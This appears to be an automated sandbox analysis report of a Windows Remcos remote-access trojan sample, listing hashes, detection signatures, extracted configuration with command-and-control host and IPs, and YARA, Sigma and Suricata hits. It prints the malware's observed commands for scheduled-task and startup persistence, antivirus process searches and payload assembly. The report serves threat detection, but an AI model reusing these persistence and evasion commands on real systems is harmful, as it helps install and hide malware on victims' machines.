Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1558585
MD5:0a8711fa1cb4189ab364c217db5f3620
SHA1:94ee709ab608d9d4ed6143a1deae85dd9fd812b3
SHA256:437c785b2093ffb955f17d63758cfb10e741509415cc55de8050e2d918716a4a
Tags:exeuser-Bitsight
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files with a suspicious file extension
Drops large PE files
Found API chain indicative of sandbox detection
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Sigma detected: Silenttrinity Stager Msbuild Activity
Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
Sigma detected: WScript or CScript Dropper
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript called in batch mode (surpress errors)
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to execute programs as a different user
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Launches processes in debugging mode, may be used to hinder debugging
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Sigma detected: SCR File Write Event
Sigma detected: Suspicious Copy From or To System Directory
Sigma detected: Suspicious Schtasks From Env Var Folder
Sigma detected: Suspicious Screensaver Binary File Creation
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • file.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 0A8711FA1CB4189AB364C217DB5F3620)
    • csc.exe (PID: 6848 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • MSBuild.exe (PID: 6776 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
  • ywezrgl.exe (PID: 3228 cmdline: C:\Users\user\AppData\Local\Temp\ywezrgl.exe MD5: 8B55759C053EC89DC1EAE85D043441A9)
    • cmd.exe (PID: 6508 cmdline: "C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 7064 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 2284 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 3116 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 5244 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 1480 cmdline: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5400 cmdline: cmd /c md 88473 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 3772 cmdline: findstr /V "partitionhansenincorporatemichigan" Classics MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 5404 cmdline: cmd /c copy /b ..\Mat + ..\Customize + ..\Downloadcom + ..\Damn + ..\Stylus + ..\Guarantees + ..\Directories + ..\Alice + ..\Pros + ..\Graham T MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Defensive.pif (PID: 5488 cmdline: Defensive.pif T MD5: 78BA0653A340BAC5FF152B21A83626CC)
        • cmd.exe (PID: 1240 cmdline: cmd /c schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 3180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • schtasks.exe (PID: 5136 cmdline: schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F MD5: 48C2FE20575769DE916F48EF0676A965)
        • cmd.exe (PID: 7096 cmdline: cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url" & echo URL="C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
          • conhost.exe (PID: 5968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • choice.exe (PID: 2680 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
  • wscript.exe (PID: 5688 cmdline: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • MusesSync.scr (PID: 7120 cmdline: "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P" MD5: 78BA0653A340BAC5FF152B21A83626CC)
  • wscript.exe (PID: 2748 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • MusesSync.scr (PID: 3568 cmdline: "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr" "C:\Users\user\AppData\Local\DataSync Dynamics\P" MD5: 78BA0653A340BAC5FF152B21A83626CC)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["oportunidad-escolombiasegura.cfd:3020:0"], "Assigned name": "mouse", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "ladsjalfhfzmvqpowieyr-3PLE3H", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "registro", "Keylog file max size": ""}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapWindows_Trojan_Remcos_b296e965unknownunknown
  • 0xc468d:$a1: Remcos restarted by watchdog!
  • 0xc4c4b:$a3: %02i:%02i:%02i:%03i

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
      00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
        00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
            Click to see the 19 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            2.2.csc.exe.96e0000.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
              4.2.MSBuild.exe.400000.0.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                4.2.MSBuild.exe.400000.0.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  4.2.MSBuild.exe.400000.0.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    4.2.MSBuild.exe.400000.0.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6aaf8:$a1: Remcos restarted by watchdog!
                    • 0x6b070:$a3: %02i:%02i:%02i:%03i
                    Click to see the 15 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: Silenttrinity Stager Msbuild Activity
                    Source: Network ConnectionAuthor: Kiran kumar s, oscd.community: Data: DestinationIp: 178.237.33.50, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6776, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49764
                    Sigma detected: Suspicious Command Patterns In Scheduled Task Creation
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1240, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F, ProcessId: 5136, ProcessName: schtasks.exe
                    Sigma detected: WScript or CScript Dropper
                    Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js", ProcessId: 5688, ProcessName: wscript.exe
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\Pictures\QuickTextPaste\Bin\QuickTextPaste.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 6476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\QuickTextPaste
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: Defensive.pif T, CommandLine: Defensive.pif T, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif, NewProcessName: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif, OriginalFileName: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6508, ParentProcessName: cmd.exe, ProcessCommandLine: Defensive.pif T, ProcessId: 5488, ProcessName: Defensive.pif
                    Sigma detected: SCR File Write Event
                    Source: File createdAuthor: Christopher Peacock @securepeacock, SCYTHE @scythe_io: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif, ProcessId: 5488, TargetFilename: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr
                    Sigma detected: Suspicious Copy From or To System Directory
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: C:\Users\user\AppData\Local\Temp\ywezrgl.exe, ParentImage: C:\Users\user\AppData\Local\Temp\ywezrgl.exe, ParentProcessId: 3228, ParentProcessName: ywezrgl.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmd, ProcessId: 6508, ProcessName: cmd.exe
                    Sigma detected: Suspicious Schtasks From Env Var Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F, CommandLine: schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F, CommandLine|base64offset|contains: j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: cmd /c schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 1240, ParentProcessName: cmd.exe, ProcessCommandLine: schtasks.exe /create /tn "Electronics" /tr "wscript //B 'C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js'" /sc minute /mo 5 /F, ProcessId: 5136, ProcessName: schtasks.exe
                    Sigma detected: Suspicious Screensaver Binary File Creation
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\88473\Defensive.pif, ProcessId: 5488, TargetFilename: C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.scr
                    Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                    Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js", CommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1068, ProcessCommandLine: C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\DataSync Dynamics\MusesSync.js", ProcessId: 5688, ProcessName: wscript.exe

                    Data Obfuscation

                    barindex
                    Sigma detected: Drops script at startup location
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\cmd.exe, ProcessId: 7096, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MusesSync.url

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Sigma detected: Search for Antivirus process
                    Source: Process startedAuthor: Joe Security: Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Demo Demo.cmd & Demo.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6508, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth" , ProcessId: 1480, ProcessName: findstr.exe

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-19T15:57:25.822428+010020327761Malware Command and Control Activity Detected192.168.2.549755181.141.40.2253020TCP
                    2024-11-19T15:58:33.250023+010020327761Malware Command and Control Activity Detected192.168.2.550061181.141.40.2253021TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-19T15:57:26.386918+010020327771Malware Command and Control Activity Detected181.141.40.2253020192.168.2.549755TCP
                    2024-11-19T15:59:39.344711+010020327771Malware Command and Control Activity Detected181.141.40.2253021192.168.2.550061TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-19T15:57:27.108455+010028033043Unknown Traffic192.168.2.549764178.237.33.5080TCP
                    2024-11-19T15:58:35.076472+010028033043Unknown Traffic192.168.2.550063178.237.33.5080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus / Scanner detection for submitted sample
                    Source: file.exeAvira: detected
                    Antivirus detection for dropped file
                    Source: C:\Users\user\Pictures\QuickTextPaste\Bin\QuickTextPaste.exeAvira: detection malicious, Label: TR/Crypt.XPACK.Gen2
                    Found malware configuration
                    Source: 4.2.MSBuild.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["oportunidad-escolombiasegura.cfd:3020:0"], "Assigned name": "mouse", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Enable", "Hide file": "Disable", "Mutex": "ladsjalfhfzmvqpowieyr-3PLE3H", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "registros.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Capturas de pantalla", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "registro", "Keylog file max size": ""}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\user\AppData\Local\Temp\ywezrgl.exeReversingLabs: Detection: 54%
                    Multi AV Scanner detection for submitted file
                    Source: file.exeReversingLabs: Detection: 50%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000004.00000002.4531361836.0000000001188000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6776, type: MEMORYSTR
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Machine Learning detection for sample
                    Source: file.exeJoe Sandbox ML: detected
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,4_2_0043293A
                    Source: csc.exe, 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_4af5a17a-6

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 4.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.csc.exe.7e55570.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.4533734135.0000000007E51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000004.00000002.4530787882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: csc.exe PID: 6848, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 6776, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 4_2_00406764 _wcslen,CoGetObject,4_2_00406764

                    Compliance

                    barindex
                    Detected unpacking (creates a PE file in dynamic memory)
                    Source: C:\Users\user\Desktop\file.exeUnpacked PE file: 0.2.file.exe.2210000.2.unpack
                    Source: file.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                    Source: unknownHTTPS traffic detected: 23.1.237.91:443 -> 192.168.2.5:49748 version: TLS 1.0
                    Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.5:49704 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 69.49.234.173:443 -> 192.168.2.5:49742 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 74.220.219.13:443 -> 192.168.2.5:49773 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 13.107.246.43:443 -> 192.168.2.5:49819 version: TLS 1.2
                    Source: Binary string: Bbfrth.pdb source: csc.exe, 00000002.00000002.4533996651.0000000009390000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008101000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: csc.exe, 00000002.00000003.2259371972.00000000084E7000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4535074365.0000000009F90000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F8B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: Bbfrth.pdb( source: csc.exe, 00000002.00000002.4533996651.0000000009390000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008101000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: csc.exe, 00000002.00000003.2259371972.00000000084E7000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000002.4535074365.0000000009F90000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000002.4532919919.0000000006F8B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: csc.exe, 00000002.00000002.4534803603.0000000009740000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.0000000008429000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000002.00000003.2259371972.00000000082E3000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32Jump to behavior
